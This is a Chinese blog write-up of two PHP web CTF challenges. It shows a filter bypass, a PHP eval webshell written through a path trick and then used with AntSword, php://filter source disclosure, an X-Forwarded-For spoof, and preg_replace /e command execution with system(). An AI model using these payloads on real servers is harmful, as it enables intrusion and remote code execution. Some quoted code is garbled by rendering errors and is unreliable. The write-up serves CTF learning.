虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。
打开题目,读到源码,进行审计。
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
include 'config.php';
$id = mysql_real_escape_string($_GET[id]);
$sql="select * from cetc007.user where id='$id'";
$result = mysql_query($sql);
$result = mysql_fetch_object($result);
} else {
$result = False;
die();
}
if(!KaTeX parse error: Expected 'EOF', got '&' at position 13: result)die("&̲lt;br >somet…result){
echo “id: “.KaTeX parse error: Expected 'EOF', got '&' at position 8: result-&̲gt;id."</br&…result->user.”</br>”;
$_SESSION[‘admin’] = True;
}
?>
这里首先需要admin权限,需要绕过id的过滤: if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') 这个的意思就是,将id浮点化之后仍然是1,并且id是以9结尾的。
可以使用id=1--9绕过,就是中间加上字符,浮点化就会舍弃后面的部分,但是字符串本身没有改变。 可以看到结果如下
下来是第二段代码
<?php
if ($_SESSION['admin']) {
$con = $_POST['con'];
$file = $_POST['file'];
$filename = "backup/".$file;
if(preg_match(’/.+.ph(p[3457]?|t|tml)$/i’, $filename)){
die(“Bad file extension”);
}else{
chdir(‘uploaded’);
f
=
f
o
p
e
n
(
f = fopen(
f=fopen(filename, ‘w’);
fwrite($f,
c
o
n
)
;
f
c
l
o
s
e
(
con); fclose(
con);fclose(f);
}
}
?>
在第一段已经获得admin之后,if可以通过。然后post进来三个参数。 这里的php正则,具体的东西我没有仔细学,之后补一补,看看大佬的wp说这个是只过滤了最后一个"."后面的东西。
可以使用../filename/.来过滤,因为backup这个文件夹并没有用到,而是uploaded这个文件夹。
然后就把自己的木马写进去就OK。附上payload。
con=<?php @eval($_POST['gwy2333']);?>&file=../gwy.php/.
记住是POST,一开始忘了,GET了半天。
这时候再次访问uploaded/gwy.php,没有出现404,说明已经写好了。开启中国蚁剑。
测试一下,连接成功。直接去找flag。在html目录底下找见了flag。
打开网站,出现page这个GET的参数,联想到文件包含读源码的漏洞,读一读index.php。 /index.php?page=php://filter/read=convert.base64-encode/resource=index.php
base64解码后得到源码。进行审计。
<?php
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
XFF改成127.0.0.1之后,GET进来三个参数。这里调用了preg_replace函数。并且没有对pat进行过滤,所以可以传入"/e"触发漏洞。
首先使用phpinfo看一下能不能执行,发现可以。
之后使用system("ls")发现可疑文件夹,之后cd进去ls,发现flag.php,cat读取即可。
rep=system("cd+s3chahahaDir/flag+%26%26+ls") 注意一下这里的引号里要加上加号,不能直接空格代替。还有&&要用url编码代替,是%26.
拿到flag,安心复习。
6537
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
